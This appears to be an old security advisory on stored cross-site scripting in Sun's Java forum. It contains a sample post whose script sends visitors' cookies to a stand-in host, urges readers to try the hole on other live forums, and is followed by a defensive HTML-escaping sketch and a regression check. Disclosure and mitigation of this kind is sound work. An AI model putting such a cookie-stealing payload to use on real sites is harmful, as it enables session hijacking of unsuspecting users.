`Sun, in their amazing patheticness, have again allowed direct HTML
to be written into their forum system.
URL: http://forum.java.sun.com/forum.jspa?forumID=553
It works on only select forums, but due to severe incompetence from
the administrators of the site, this issue will occur quite often.
It is worth your while to test out any forum you like; you may just
see it working.
EXPLOIT (hah):
==============
Start a new thread or post a reply and include any HTML you like,
preferably to steal a cookie or trick users into logging in again
but submit to your server; your imagination is the only restriction.
EXAMPLE:
==============
Message:
Hello.
<img id="xxa" />
<script>window.attachEvent("onload", foo);
function foo() {
xxa.src = "http://www.example.com/steal/?" + document.cookie;
}
</script>
FIX:
==============
Sun needs to accept that their administration of the site is
absolutely terrible and do something about it. The Jive software
that runs the forum is completely fine; it is Sun's mismanagement
that causes these issues. Jive should not be subject to the very
bad image the forum software gets from its use on Sun's site.
Thanks.
`
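The advisory names no technical fix beyond administration of the site. As an added example (not from the advisory and not Jive code), the sketch below shows the unescaped rendering the advisory describes beside an output-encoded form, plus a regression check a site operator could run over rendered posts. The function names and the wrapper markup are assumptions made for illustration.

```javascript
// Added example: rendering a forum message body on the server.
// All function names and the <div class="post"> wrapper are hypothetical.

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode every character that can open a tag, an attribute value or an entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Behaviour described in the advisory: the body reaches the page as-is.
function renderPostUnsafe(body) {
  return '<div class="post">' + body + "</div>";
}

// Hardened form: the body is treated as text. Line breaks are converted
// only after escaping, so <br> is the only tag the renderer itself emits.
function renderPostEscaped(body) {
  const text = escapeHtml(body).replace(/\r?\n/g, "<br>");
  return '<div class="post">' + text + "</div>";
}

// Regression check: true if any tag other than the renderer's own <br>
// survives inside the wrapper, i.e. user-supplied markup is still live.
function containsActiveMarkup(html) {
  const inner = html
    .replace(/^<div class="post">/, "")
    .replace(/<\/div>$/, "");
  return /<(?!br>)[a-z!\/]/i.test(inner);
}

// Sample input constructed from the message shown in the advisory.
const SAMPLE_MESSAGE = [
  "Hello.",
  '<img id="xxa" />',
  '<script>window.attachEvent("onload", foo);',
  "function foo() {",
  'xxa.src = "http://www.example.com/steal/?" + document.cookie;',
  "}",
  "</script>",
].join("\n");

console.log(containsActiveMarkup(renderPostUnsafe(SAMPLE_MESSAGE)));  // true
console.log(containsActiveMarkup(renderPostEscaped(SAMPLE_MESSAGE))); // false
```

Running the check against every forum's rendered output, rather than one, matters here because the advisory reports that only select forums are affected.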